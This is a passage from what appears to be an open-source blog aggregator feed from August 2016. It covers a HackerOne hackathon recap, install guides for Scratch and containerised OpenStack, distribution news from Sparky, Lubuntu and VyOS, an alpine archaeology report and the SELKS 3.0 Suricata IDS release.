While competitive, it was also social, with people having a good time and getting to know each other. Speaking personally, it was great to meet some hackers who I have been following for a while. It was a thrill to watch them work.

Taking Care of Your Best

In every community you always get a variance of quality and commitment. Some people will be casual contributors and some will invest significant time and energy in the community and their work. It is always critical to really take care of your best, and H1-702 was one way we want to do this at HackerOne.

Given this, we wanted to deliver a genuinely premium event for these hackers and ensure that everyone received impeccable service and attention, not just at the event but from the minute they arrived in Vegas. After all, they have earned it.


This was an exercise in detail. We ensured we had a comfortable event space in a cool hotel. We had oodles of booze, with some top-shelf liquor. We provided food throughout the evening and brought in-chair massages later in the night to re-invigorate everyone. We provided plenty of seating, both in quiet and noisier spaces, lots of power sockets and we worked to have fast and reliable Internet. We provided each hacker with a HackerOne backpack, limited edition t-shirts, and other swag such as H1-702 challenge coins. We ensured that there was always someone hackers could call to solve problems, and we were receptive to feedback each night to improve it the following night.

Throughout the evening we worked to cater to the needs of hackers. We had members of HackerOne helping hackers solve problems, keeping everyone hydrated and fed, and making sure everyone was having a good time. HackerOne CEO Mårten Mickos was also running around like a waiter (amusingly with a white towel) ensuring everyone had drinks in their hands.

Overall, it was a fun event and while it went pretty well, there is always plenty to learn and improve for next time. If this sounds like fun, be sure to go and sign up and hack on some programs and earn a spot next year.

The post Running a Hackathon for Security Hackers appeared first on Jono Bacon.

15 August, 2016 03:00PM


Emmabuntüs Debian Edition

The march of the YovoTogo children toward the digital age

With a population of 7.5 million inhabitants and an area of 56,785 km², the Togolese Republic is a West African country whose economy is based mainly on food crops and phosphate mines. Its true wealth is the wide variety of landscapes, going from arid plains to green valleys, passing through great savannas in the north [...]

15 August, 2016 01:45PM by yves


Ubuntu developers

Cesar Sevilla: Scratch, an interesting piece of software

Hello everyone. After a long time I have allowed myself to write this article in order to share a recent experience with a training program presented by www.zuliatec.com called Procodi (www.procodi.com), a training program for children that gives them, from a very early age, tools that allow them to develop skills in the areas of software development, graphic design, digital electronics, robotics, digital media, and digital music.

Scratch (as its own website says) is designed especially for ages 8 to 16, but it is used by people of all ages. Millions of people are creating Scratch projects in a wide variety of settings, including homes, schools, museums, libraries, and community centers.

The site also says: the ability to code computer programs is an important part of literacy in today’s society. When people learn to program in Scratch, they learn important strategies for solving problems, designing projects, and communicating ideas.

Since this tool is very useful for children and adults alike, I will explain in a simple way how to run the program offline on GNU/Linux.

If you use GNOME or a derivative, you need to have the Gnome-Keyring library installed; if you use KDE, you must have Kde-Wallet installed.

In this example I explain how to get Scratch working on Linux Mint; the steps should also work on operating systems derived from Debian.

  1. First download the files to install Adobe Air and Scratch for Linux from the official Scratch website, https://scratch.mit.edu/scratch2download/ (they are also available for Windows and Mac).
  2. Then install gnome-keyring: sudo aptitude install gnome-keyring
  3. Add two symbolic links in /usr/lib/ as follows: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. Then, in a terminal, change to the directory containing the Adobe Air installer and run: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Follow all the steps the installer shows you and have a little patience.
  6. With Adobe Air installed, locate the file Scratch-448.air in the file manager and open it with the Adobe AIR Application Installer. This also requires a little patience, but when it finishes it will create a shortcut on your desktop from which you can launch Scratch whenever you want.
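For convenience, steps 2 to 4 can be collected into a single script. This is only a sketch: the package name and library paths are copied verbatim from the steps above, AdobeAIRInstaller.bin is assumed to be in the current directory, and the installation commands only run when the script is invoked with --run, since they need root privileges and network access.

```shell
#!/bin/bash
# Sketch of steps 2-4: install gnome-keyring, create the two symlinks
# Adobe AIR expects, then launch the AIR installer.
set -eu

LIBDIR=/usr/lib/i386-linux-gnu

install_scratch_prereqs() {
  sudo aptitude install -y gnome-keyring
  sudo ln -sf "$LIBDIR/libgnome-keyring.so.0"     /usr/lib/libgnome-keyring.so.0
  sudo ln -sf "$LIBDIR/libgnome-keyring.so.0.2.0" /usr/lib/libgnome-keyring.so.0.2.0
  chmod +x AdobeAIRInstaller.bin
  ./AdobeAIRInstaller.bin
}

# Only perform the installation when explicitly requested.
if [ "${1:-}" = "--run" ]; then
  install_scratch_prereqs
fi
```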

With the above we can now use Scratch offline, but remember that, as you may have noticed on the official project website, you can also use it online.

Happy Hacking.


15 August, 2016 11:03AM

Ubuntu Insights: Lunch & Learn with OpenStack Containers

Follow the instructions in this article to spend around an hour over your lunch time to get an entire Ubuntu OpenStack cloud up and running in containers on a single machine. The resulting cloud will launch container based workloads.

News about containers with OpenStack is everywhere right now. Be it OpenStack running on containers, running containers in OpenStack, orchestrating containers across multiple clouds including OpenStack, or setting up networking for containers within OpenStack, there is quite a buzz. Some of it is new, but many OpenStack distributions have been making extensive use of containers to run OpenStack services for well over 12 months. Canonical is no exception and was one of the first distributions to deploy OpenStack services in containers. It is now really easy to set up a real (i.e. not DevStack) cloud on a single machine that is 100% container based.

Pre-requisites

A desktop, laptop, server or VM with 16GB RAM and 50GB of disk space available, running Ubuntu 16.04.

Note: we recommend using the Ubuntu Desktop edition for testing, as it will allow you to access Horizon from a browser without the need to set up external networking or deal with ssh tunnels and port forwarding.

Instructions

First, make sure 16.04 is up to date:

$ sudo apt update
$ sudo apt upgrade

This should bring everything up to date.

Now install zfs and lxd:

$ sudo apt install zfsutils-linux lxd

and reboot

$ sudo reboot

Next, setup lxd to use zfs:

$ sudo lxd init

This will ask a number of questions, recommended answers are in bold:

Name of the storage backend to use (dir or zfs): zfs
Create a new ZFS pool (yes/no)? yes
Name of the new ZFS pool: OpenStack
Would you like to use an existing block device (yes/no)? no
Size in GB of the new loop device (1GB minimum): 50
Would you like LXD to be available over the network (yes/no)? no
Do you want to configure the LXD bridge (yes/no)? yes

This will launch an ncurses interface to set up LXD networking.

[Screenshot: LXD bridge configuration dialog]
Hit return to accept the defaults until you see

[Screenshot: the IPv6 configuration prompt]
Since we just want to set this up in our own internal environment, we can skip IPv6 for now, so select No and then hit return. This will drop you back out to the bash prompt.

Now we need to get lxd running and the network bridge loaded:

$ lxc finger
$ lxc list

This will give some output along the lines of:

Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

Next, add a repository to grab the latest conjure-up packages:

$ sudo apt-add-repository ppa:conjure-up/next

Likewise for Juju:

$ sudo apt-add-repository ppa:juju/devel

Update our repos once more:

$ sudo apt update

Install the conjure-up package:

$ sudo apt install conjure-up

This will install quite a few things including juju and may take a few minutes, when it finishes you can get going installing OpenStack with:

$ conjure-up openstack

This will launch an ncurses interface to set up OpenStack.

[Screenshot: conjure-up spell selection]
Select localhost as the target, as we want to set it all up locally, and then select ‘OpenStack with Nova-LXD’.

As the install requires Ceph you will now be asked a question about the number of Ceph Units you want to run.

[Screenshot: the Ceph units question]
Select the option [ Deploy all 14 Remaining Applications with Bundle Defaults ]

On the final screen hit ‘Continue’ and you should be installing. Depending on your hardware this could take anywhere between 30 and 60 mins. Now is a great time to eat your lunch whilst watching the progress.

Once the services are deployed, you will be asked a number of questions:

[Screenshot: post-deployment configuration questions]

  • Import glance images – yes
  • Import SSH keypairs – recommended if you have an ssh key.
  • Configure OpenStack networking – required if you wish to be able to access the running guest instances from the outside world.
  • Configure Horizon – yes

Do not hit “View Summary” just yet – you need to wait until each of the hourglasses next to the questions turns green. Only once you have 5 green lights should you hit [View Summary], as below:

[Screenshot: all five questions showing green lights]

Once complete you will be presented with a URL and a username/password combination to log in to Horizon. We need to ensure that Horizon is accessible from the outside world:


$ juju expose openstack-dashboard

Then

$ juju status openstack-dashboard

Make sure that the service is exposed and copy its IP address.

Launch a browser and give it a go at http://<ip_address>/horizon

Default username = admin

Default password = openstack
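To avoid retyping the address, the last step can be wrapped in a tiny helper. This is purely a hypothetical convenience: the function just assembles the Horizon URL from whatever IP address you copied out of `juju status`, and the 10.0.4.20 address below is made up for illustration.

```shell
# Hypothetical helper: given the openstack-dashboard IP address copied
# from `juju status openstack-dashboard`, print the Horizon URL to open
# in a browser.
horizon_url() {
  local ip="$1"
  echo "http://${ip}/horizon"
}

horizon_url 10.0.4.20   # prints http://10.0.4.20/horizon
```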

If you want to see all the containers running on your machine, run:

$ lxc list

This should give you output along the lines of:

[Screenshot: lxc list output]

Each line represents an OpenStack service running in its own container. If you want to access any of the containers to poke around, you can run:

$ lxc exec <service name as given in the first column> bash

for example:

$ lxc exec juju-9cb02c-9 bash

In the next installment we’ll show you how to deploy workloads into your newly running cloud. In the meantime, have fun!

15 August, 2016 09:00AM

Paul Tagliamonte: Minica - lightweight TLS for everyone!

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensible CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tld domain.tld will issue two TLS certs (one with a Client EKU, and one server), both issued from a single CA.

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

15 August, 2016 12:40AM

August 14, 2016


SparkyLinux

Sparky news 08/2016

 

A few lines should let you know what is going on inside Sparky.

If everything goes fine, new live/install iso images of Sparky 4.4 should be ready at the end of next week.

The ‘Calamares’ installer is available in our repository, but it is not yet configured to install the system on UEFI machines.

An issue in the ‘live-installer’ has been fixed, so it remains our default installer, and the Advanced Installer is provided as a backup to the main one.

The ‘Advanced Installer’ used on the Sparky MinimalGUI or MinimalCLI iso image now lets you install one of 22 desktop environments/window managers (awesome, bspwm, Budgie, Cinnamon, Enlightenment, Fluxbox, GNOME Flashback, GNOME Shell, i3, IceWM, JWM, KDE Plasma 5, Lumina, LXDE, LXQt, MATE, Openbox, Pantheon, PekWM, Trinity, Window Maker, Xfce) and one of 11 web browsers (Chromium, Dillo, Epiphany, Firefox, Konqueror, Midori, NetSurf, QupZilla, SeaMonkey, TOR Browser, Vivaldi).

Vivaldi web browser has been added to Sparky repos (can be installed via APT, Synaptic or Sparky APTus Extra).
A lightweight NetSurf web browser has been moved from Debian Sid repos to ours.
BlueGriffon – a WYSIWYG content editor for the World Wide Web has been upgraded up to the latest version 2.2.1.
The latest stable version of Firefox landed in Sparky repos.

The ‘sparky-backup-core’ package has been split into two packages: ‘sparky-backup-core’ and ‘sparky-backup-desktop’. This lets the Advanced Installer update itself, including the set of desktops and settings available for installation via the Minimal iso images.

Sparky Office tool lets you install an Office suite and a PDF (and other documents) viewer now.

Sparky Wiki has been improved, adding new pages.

Feel free to ask a question or leave your feedback on our forums, or just send a donation to keep Sparky alive.

 

14 August, 2016 12:44PM by pavroo

August 13, 2016

hackergotchi for VyOS

VyOS

dead.vyos.net and contributing to VyOS

Hi everyone,

This is a bit embarrassing. For almost a day, http://www.vyos.net (but not http://vyos.net) was sending people to the http://dead.vyos.net website, until someone on IRC pointed it out (thanks for that!).

It happened due to an oddity in the way Apache HTTPD handles host aliases, and it's fixed now.
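For illustration only (the vhost names and paths below are hypothetical, not the actual VyOS configuration), here is one plausible way such a mix-up can happen: Apache serves a request whose Host header matches no ServerName or ServerAlias from the *first* &lt;VirtualHost&gt; loaded for that address and port, and Debian-style setups load site configs alphabetically, so a `dead.vyos.net` config would sort before `vyos.net`:

```apache
# Hypothetical sketch. Config files load alphabetically, so this vhost
# (dead.vyos.net) comes first and becomes the default for *:80.
<VirtualHost *:80>
    ServerName dead.vyos.net
    DocumentRoot /srv/www/dead.vyos.net
</VirtualHost>

# If "www.vyos.net" is missing from the aliases here, requests for it
# match nothing and fall through to the first vhost above.
<VirtualHost *:80>
    ServerName vyos.net
    ServerAlias www.vyos.net   # without this line, www goes to dead.vyos.net
    DocumentRoot /srv/www/vyos.net
</VirtualHost>
```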

The dead.vyos.net website was created as a joke: a link to give to people who ask whether the VyOS project is dead. While the website is indeed a joke, the shortage of contributors is very real, and it does slow things down.

If you want to contribute to VyOS, there is a lot of work to be done, and the maintainers on IRC and in Phabricator will be happy to point you to beginner-friendly tasks and answer questions about the code and the patch submission process.


13 August, 2016 09:17PM

hackergotchi for Ubuntu developers

Ubuntu developers

Simon Quigley: A look at Lubuntu's LXQt Transition

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration to LXQt. It's going to be a long process, but I thought I might write about some of the things that go into it.

Step 1 - Getting a metapackage

This step is already done, and the metapackage was installable the last time I checked in a virtual machine. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, there's still a lot to be tweaked. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and a lot is still missing. So while you can install the package and play around with it, it needs considerable work before it's ready for everyday use.

Also in this image are our candidate applications (not final yet) for inclusion in Lubuntu.

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two merge proposals adding this have now been merged, and we're waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much of the system's resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.
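To give an idea of what gauging resource usage can look like, here's a minimal sketch (not an official Lubuntu benchmark tool) that reads the kernel's /proc/meminfo to estimate how much RAM an idle session is using:

```python
def parse_meminfo(text):
    """Parse /proc/meminfo-style text into a dict of kB values."""
    values = {}
    for line in text.splitlines():
        if ":" in line:
            key, rest = line.split(":", 1)
            # Each line looks like "MemTotal:  2048000 kB"
            values[key.strip()] = int(rest.strip().split()[0])
    return values

def used_kb(info):
    # MemAvailable (kernels >= 3.14) is a better estimate than MemFree,
    # since it accounts for reclaimable caches.
    free = info.get("MemAvailable", info.get("MemFree", 0))
    return info["MemTotal"] - free

if __name__ == "__main__":
    try:
        with open("/proc/meminfo") as f:
            info = parse_meminfo(f.read())
        print(f"Roughly {used_kb(info) / 1024:.0f} MiB in use")
    except OSError:
        pass  # /proc/meminfo only exists on Linux
```

Running this right after logging in to two different sessions (say, LXDE and LXQt) gives a rough point of comparison.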

Step 3 - Testing

An essential part of any good operating system is testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle to track our progress on test cases, and the sooner those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the toughest step of all. We need to pick the applications that best suit our users' use cases (many of our users run older hardware) and needs (LibreOffice, for example). Every application will most likely need a week or two of proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see, and to give your feedback on the existing applications, before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages, not only in its applications but in the desktop itself. Depending on how notable some things are, I might do a blog post in the future; otherwise, see for yourself. :)

Here is our blueprint, which will be updated a lot in the next week or so and will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

13 August, 2016 06:18PM by Simon Quigley (tsimonq2@ubuntu.com)

hackergotchi for ArcheOS

ArcheOS

Glacial Finds from the Langgrubenjoch (Gde. Mals and Gde. Schnals) in South Tyrol. Preliminary Report


We've published a preliminary report, in German, about our project on the Langgrubenjoch (South Tyrol) in the German journal Archäologisches Korrespondenzblatt.
Its profile is that of a topical scientific journal on issues of Prehistoric, Roman and Medieval archaeology and related sciences in Europe. Besides topical debates, the journal provides a place for the publication of new finds and short analyses of general interest. (Definition by the RGZM)
Bringing home the finds

Finds from thawing névés and ice fields were discovered at the Langgrubenjoch (3017 m a. s. l.) between Matscher- and Schnalstal in the southern Ötztal Alps. The finds are predominantly made up of wooden parts, many of which are fragments of boards and show tool marks. 
GPS
First radiocarbon and dendro dates reveal artefacts dating back to the Copper Age, the middle to late Bronze Age, and the Roman period. The tool marks and comparable finds suggest that the pieces of boards, consisting of larch (Larix decidua), were the remains of the roof shingles of a late Bronze Age hut.
Parallel documentation with Geopaparazzi
Although the Langgrubenjoch cannot be crossed easily, it is the shortest route between the Obere Vinschgau in the area of Mals and Schnalstal and the region north of the main Alpine ridge. The periods of time indicated by the finds, i.e. the late 3rd and 2nd millennia BC as well as the Roman period, witnessed a relatively low extent of the glaciers, i.e. warm phases.

Documentation
In those times the Langgrubenjoch was possibly more easily accessible and therefore used more intensively.

Glacial Finds from the Langgrubenjoch (Gde. Mals and Gde. Schnals) in South Tyrol. Preliminary Report

Authors:
Alessandro Bezzi, Giuseppe Naponiello, Rupert Gietl (Arc-Team)
Hubert Steiner (Cult. Heritage Dep. of South-Tyrol)
Kurt Nicolussi, Thomas Pichler (Uni Innsbruck)

Archäologisches Korrespondenzblatt 46 (2016) 167-182.

Related postings & videos:

13 August, 2016 11:36AM by Rupert Gietl (noreply@blogger.com)

August 12, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Jono Bacon: My Blog is Creative Commons Licensed

Earlier this week I was asked this on Twitter:

Screenshot from 2016-08-12 22-50-26

An entirely reasonable question given that I had entirely failed to provide clarity on how my content is licensed on each page. So, thanks, Elio, for helping me to fix this. You will now see a licensing blurb at the bottom of each post as well as a licensing drop-down item in the menu.

To clarify: all content on my blog is licensed under the Creative Commons Attribution-ShareAlike license. I have been a long-time free culture and Creative Commons fan, supporter, and artist (see my archive of music, podcasts, and more here), so this license is a natural choice.

Let’s now explore what you can do with my content under the parameters of this license.

What You Can Do

The license is pretty simple. You are allowed to:

  • Share – feel free to share my blog posts with whoever you want.
  • Remix – you are welcome to use my posts and create derived works from them.

…there is a requirement though. You are required to provide attribution for my content. I don’t need a glowing missive about how the article changed your life, just a few words that reference me as the author and point to the original article, that’s all. Something like:

‘My Blog is Creative Commons Licensed’ originally written by Jono Bacon and originally published at http://www.jonobacon.org/2016/08/12/my-blog-is-creative-commons-licensed/

will be great. Thanks!

To learn more about your rights with my content, see the license details.

What I Would Love You to Do

So, that’s what you are allowed to do, but what would I selfishly love you to do with my content?

Well, a bunch of things:

  • Share it – I try to write things on this blog that are helpful to others, but it is only helpful if people read it. So, your help sharing and submitting my posts on and to social media, news sites, other blogs, and elsewhere is super helpful.
  • Include and reference it in other work – I always love to see my work included and referenced in other blog posts, books, research papers, and elsewhere. If you find something useful in my writing, feel free to go ahead and use it.
  • Translate it – I would love to see my posts translated into different languages, just like Elio offered to do. If you do make a translation, let me know so I can add a link to it in the original article.

Of course, if you have any other questions, don’t hesitate to get in touch and whether you just read my content or choose to share, derive, or translate it, thanks for being a part of it! 🙂

The post My Blog is Creative Commons Licensed appeared first on Jono Bacon.

12 August, 2016 02:59PM

hackergotchi for Stamus Networks

Stamus Networks

The third SELKS is out

Yes, we did it: the much-awaited SELKS 3.0 is out. This is the first stable release of the new branch that brings you the latest Suricata and Elastic stack technology.

SELKS is both a Live and an installable Network Security Management ISO based on Debian, implementing and focusing on a complete, ready-to-use Suricata IDS/IPS ecosystem with its own graphical rule manager. Stamus Networks is a proud member of the Open Source community, and SELKS is released under the GPLv3 license.

Suricata page in Scirius

Suricata page in Scirius

Main changes and new features

Suricata 3.1.1

SELKS 3.0 comes with the latest Suricata, namely 3.1.1, bringing a big performance boost as well as some new IDS and NSM capabilities.

Elasticsearch 2.x and Kibana 4

But the main change in SELKS 3.0 is the switch to the latest generation of the Elastic stack. On the user side, this means Kibana 3 has been replaced by Kibana 4. And that means a lot: Kibana 4 is a complete rewrite of Kibana 3 and is not backward compatible on the data side, so our team had to redo all dashboards and visualizations from scratch. The result is a new set of 11 ready-to-use dashboards and a lot of visualizations that you can use to build your own dashboards.
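Under the hood, Kibana 4 dashboards are driven by Elasticsearch aggregations. As a hedged illustration of the kind of query such a dashboard runs, here is a sketch that builds an Elasticsearch 2.x request body counting the top alert signatures; the field names (`event_type`, `alert.signature`) follow Suricata's EVE JSON schema, but the exact index name and mapping used by SELKS are assumptions:

```python
import json

def top_alerts_query(size=10):
    """Build an ES 2.x search body: top Suricata alert signatures by count.

    Field names (event_type, alert.signature) follow Suricata's EVE JSON
    output; the actual SELKS index mapping may differ.
    """
    return {
        "size": 0,  # we only want the aggregation, not the raw hits
        "query": {"term": {"event_type": "alert"}},
        "aggs": {
            "top_signatures": {
                "terms": {"field": "alert.signature", "size": size}
            }
        },
    }

if __name__ == "__main__":
    # You would POST this body to e.g. http://localhost:9200/logstash-*/_search
    print(json.dumps(top_alerts_query(), indent=2))
```

The same pattern (a filter query plus a `terms` aggregation) underlies most of the "top N" panels in the shipped dashboards.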

Kibana Alert dashboard

Kibana Alert dashboard

correlate-alerts

Complete flow and rule correlation view of an alert

Latest Scirius Community Edition

On the ruleset management side, SELKS 3.0 comes with Scirius Community Edition 1.1.10, which has support for advanced Suricata features like xbits.

Thresholding

Suppression with Scirius

Thresholding-1

Threshold and suppress ruleset view with Scirius

Thresholding-2

Thresholding with Scirius

Scirius CE also brings thresholding and suppression support, as well as an integrated backup system which, besides backing up locally, supports locations such as:

  • FTP
  • Amazon AWS
  • Dropbox
Evebox

SELKS 3.0 comes with Evebox, an alert management/viewer/report interface for Suricata that presents events as a mailbox, providing classification via acknowledgement and escalation.

Mailbox view in Evebox

Mailbox view in Evebox

One of the other interesting features of Evebox is the capability to create and export pcaps generated from events:

Pcap-1

Payload pcap generation (Evebox)

Pcap-2

Payload pcap generation (Evebox)

Features list

  • Suricata IDS/IPS/NSM – Suricata 3.1.1 packaged.
  • Elasticsearch 2.3.5 – the latest available ES edition, featuring speed, scalability, security improvements and more.
  • Logstash 2.3.4 – performance improvements, ES 2.3 compatibility, dynamic pipeline reloading on the fly, and more.
  • Kibana 4.5.4 – taking advantage of the latest features and performance improvements of ES.
  • Scirius 1.1.10 – support for xbits, hostbits, thresholding, suppression, backup and more.
  • Evebox – alert management/viewer/report interface for Suricata/ES allowing easy export of payloads/packets into pcaps.
  • 4.4.x long-term kernel – SELKS 3.0 ships with the 4.4.16 kernel by default.
  • Dashboards – reworked dashboards with flow and rule correlation capability.

SELKS comes with 11 ready-to-use Kibana dashboards. More than 190 visualizations are also available to mix, match, and customize into your own dashboards.

Please feel free to try it out, spread the word, send feedback, and let's talk about SELKS 3.0.

To get you started

Once downloaded and installed, you can get access to all components via https://your.selks.IP.here/

The default user and password for both web interface and system is:

  • user: selks-user
  • password: selks-user

The default root password is StamusNetworks.

Please note that in Live mode the password for the selks-user system user is live.

Upgrades

There is no direct upgrade path from SELKS 2.0 to SELKS 3.0, due to a number of breaking compatibility changes between Elasticsearch 1.x and 2.x and between Kibana 3.x and 4.x. The only supported upgrade path is from SELKS 3.0RC1 to SELKS 3.0.

More about SELKS 3.0

12 August, 2016 08:29AM by Peter Manev